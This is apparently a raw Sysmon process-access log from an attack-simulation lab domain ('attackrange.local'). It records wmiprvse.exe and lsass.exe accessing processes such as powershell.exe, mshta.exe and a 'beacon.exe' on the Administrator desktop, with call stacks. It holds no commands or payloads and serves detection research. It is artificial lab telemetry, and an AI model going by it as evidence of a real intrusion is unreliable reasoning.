10341000x80000000000000002236779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 